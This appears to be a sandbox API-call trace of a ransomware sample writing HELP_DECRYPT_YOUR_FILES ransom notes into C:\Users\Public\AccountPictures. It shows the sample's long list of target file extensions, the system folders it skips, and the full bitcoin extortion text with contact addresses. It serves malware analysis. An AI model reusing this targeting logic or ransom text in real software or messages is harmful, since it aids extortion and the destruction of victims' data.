	[0180.453] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0x436238c4, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x436238c4, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x436238c4, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0180.453] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x436238c4, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x436238c4, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x436238c4, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0xc4, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1
	[0180.453] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1
	[0180.453] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1
	[0180.453] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\Public\\AccountPictures\\" | out: lpString1="C:\\Users\\Public\\AccountPictures\\") returned="C:\\Users\\Public\\AccountPictures\\"
	[0180.453] lstrcatW (in: lpString1="C:\\Users\\Public\\AccountPictures\\", lpString2="desktop.ini" | out: lpString1="C:\\Users\\Public\\AccountPictures\\desktop.ini") returned="C:\\Users\\Public\\AccountPictures\\desktop.ini"
	[0180.453] lstrlenW (lpString="C:\\Users\\Public\\AccountPictures\\desktop.ini") returned 43
	[0180.453] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0180.507] CharLowerBuffW (in: lpsz="C:\\Users\\Public\\AccountPictures\\desktop.ini", cchLength=0x2b | out: lpsz="c:\\users\\public\\accountpictures\\desktop.ini") returned 0x2b
	[0180.507] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.507] StrStrW (lpFirst="c:\\users\\public\\accountpictures\\desktop.ini", lpSrch="help_decrypt_your_files") returned 0x0
	[0180.508] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\public\\accountpictures\\desktop.ini" | out: lpString1="c:\\users\\public\\accountpictures\\desktop.ini") returned="c:\\users\\public\\accountpictures\\desktop.ini"
	[0180.508] lstrlenW (lpString="c:\\users\\public\\accountpictures\\desktop.ini") returned 43
	[0180.508] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0180.508] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.508] StrStrW (lpFirst=".ini", lpSrch=".") returned=".ini"
	[0180.508] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.509] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".ini") returned 0x0
	[0180.509] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x436238c4, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x436238c4, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x436238c4, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0xc4, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0
	[0180.509] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0180.509] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0180.509] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\Public\\AccountPictures" | out: lpString1="C:\\Users\\Public\\AccountPictures") returned="C:\\Users\\Public\\AccountPictures"
	[0180.510] lstrcatW (in: lpString1="C:\\Users\\Public\\AccountPictures", lpString2="\\*.*" | out: lpString1="C:\\Users\\Public\\AccountPictures\\*.*") returned="C:\\Users\\Public\\AccountPictures\\*.*"
	[0180.510] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0180.510] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0180.510] wsprintfW (in: param_1=0x18bd90, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\Public\\AccountPictures\\HELP_DECRYPT_YOUR_FILES.TXT") returned 59
	[0180.510] CreateFileW (lpFileName="C:\\Users\\Public\\AccountPictures\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\public\\accountpictures\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0180.512] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0180.512] WriteFile (in: hFile=0x380, lpBuffer=0x18b148*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18c06c, lpOverlapped=0x0 | out: lpBuffer=0x18b148*, lpNumberOfBytesWritten=0x18c06c*=0xc46, lpOverlapped=0x0) returned 1
	[0180.516] CloseHandle (hObject=0x380) returned 1
	[0180.517] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b118, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b118*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0180.517] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0180.517] GetUserNameA (in: lpBuffer=0x18affc, pcbBuffer=0x18b114 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b114) returned 1
	[0180.518] wsprintfW (in: param_1=0x18bf98, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0180.518] CreateFileW (lpFileName="C:\\Users\\Public\\AccountPictures\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\public\\accountpictures\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0180.519] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0180.519] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0180.519] WriteFile (in: hFile=0x380, lpBuffer=0x18bf98*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18c074, lpOverlapped=0x0 | out: lpBuffer=0x18bf98*, lpNumberOfBytesWritten=0x18c074*=0x30, lpOverlapped=0x0) returned 1
	[0180.519] CloseHandle (hObject=0x380) returned 1
	[0180.519] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0180.520] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0180.520] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0180.520] wsprintfW (in: param_1=0x18bd50, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\Public\\AccountPictures\\HELP_DECRYPT_YOUR_FILES.HTML") returned 60
	[0180.520] CreateFileW (lpFileName="C:\\Users\\Public\\AccountPictures\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\public\\accountpictures\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0180.524] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0180.524] WriteFile (in: hFile=0x380, lpBuffer=0x18b544*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0x18b544*, lpNumberOfBytesWritten=0x18c068*=0x808, lpOverlapped=0x0) returned 1
	[0180.527] CloseHandle (hObject=0x380) returned 1
	[0180.528] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0180.528] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b52c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b52c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0180.528] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0180.528] GetUserNameA (in: lpBuffer=0x18b410, pcbBuffer=0x18b528 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b528) returned 1
	[0180.529] wsprintfA (in: param_1=0x18bf58, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0180.530] CreateFileW (lpFileName="C:\\Users\\Public\\AccountPictures\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\public\\accountpictures\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0180.530] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0180.530] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0180.530] WriteFile (in: hFile=0x380, lpBuffer=0x18bf58*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18c070, lpOverlapped=0x0 | out: lpBuffer=0x18bf58*, lpNumberOfBytesWritten=0x18c070*=0x43, lpOverlapped=0x0) returned 1
	[0180.530] CloseHandle (hObject=0x380) returned 1
	[0180.531] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\AccountPictures\\*.*" (normalized: "c:\\users\\public\\accountpictures\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0x436238c4, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x436238c4, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x85216cc9, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0180.531] lstrlenW (lpString="C:\\Users\\Public\\AccountPictures\\*.*") returned 35
	[0180.531] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0180.531] CharLowerBuffW (in: lpsz="C:\\Users\\Public\\AccountPictures\\*.*", cchLength=0x23 | out: lpsz="c:\\users\\public\\accountpictures\\*.*") returned 0x23
	[0180.531] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.532] StrStrW (lpFirst="c:\\users\\public\\accountpictures\\*.*", lpSrch="windows") returned 0x0
	[0180.533] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.533] StrStrW (lpFirst="c:\\users\\public\\accountpictures\\*.*", lpSrch="boot") returned 0x0
	[0180.533] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.533] StrStrW (lpFirst="c:\\users\\public\\accountpictures\\*.*", lpSrch="system volume information") returned 0x0
	[0180.533] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.533] StrStrW (lpFirst="c:\\users\\public\\accountpictures\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0180.533] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.534] StrStrW (lpFirst="c:\\users\\public\\accountpictures\\*.*", lpSrch="temp") returned 0x0
	[0180.534] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.534] StrStrW (lpFirst="c:\\users\\public\\accountpictures\\*.*", lpSrch="program files") returned 0x0
	[0180.534] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.534] StrStrW (lpFirst="c:\\users\\public\\accountpictures\\*.*", lpSrch="program files (x86)") returned 0x0
	[0180.534] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.534] StrStrW (lpFirst="c:\\users\\public\\accountpictures\\*.*", lpSrch="appdata") returned 0x0
	[0180.535] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.535] StrStrW (lpFirst="c:\\users\\public\\accountpictures\\*.*", lpSrch="application data") returned 0x0
	[0180.535] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.535] StrStrW (lpFirst="c:\\users\\public\\accountpictures\\*.*", lpSrch="winnt") returned 0x0
	[0180.535] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.535] StrStrW (lpFirst="c:\\users\\public\\accountpictures\\*.*", lpSrch="tmp") returned 0x0
	[0180.535] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.535] StrStrW (lpFirst="c:\\users\\public\\accountpictures\\*.*", lpSrch="cache") returned 0x0
	[0180.536] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.536] StrStrW (lpFirst="c:\\users\\public\\accountpictures\\*.*", lpSrch="temporary internet files") returned 0x0
	[0180.536] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.536] StrStrW (lpFirst="c:\\users\\public\\accountpictures\\*.*", lpSrch="webcache") returned 0x0
	[0180.536] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.536] StrStrW (lpFirst="c:\\users\\public\\accountpictures\\*.*", lpSrch="inetcache") returned 0x0
	[0180.536] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.536] StrStrW (lpFirst="c:\\users\\public\\accountpictures\\*.*", lpSrch="nvidia") returned 0x0
	[0180.537] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.537] StrStrW (lpFirst="c:\\users\\public\\accountpictures\\*.*", lpSrch="packages") returned 0x0
	[0180.537] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.537] StrStrW (lpFirst="c:\\users\\public\\accountpictures\\*.*", lpSrch="cookies") returned 0x0
	[0180.537] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.537] StrStrW (lpFirst="c:\\users\\public\\accountpictures\\*.*", lpSrch="programdata") returned 0x0
	[0180.537] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0180.537] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0180.538] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0x436238c4, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x436238c4, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x85216cc9, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0180.538] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0180.538] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x436238c4, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x436238c4, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x436238c4, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0xc4, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1
	[0180.538] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85216cc9, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x85216cc9, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x85216cc9, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
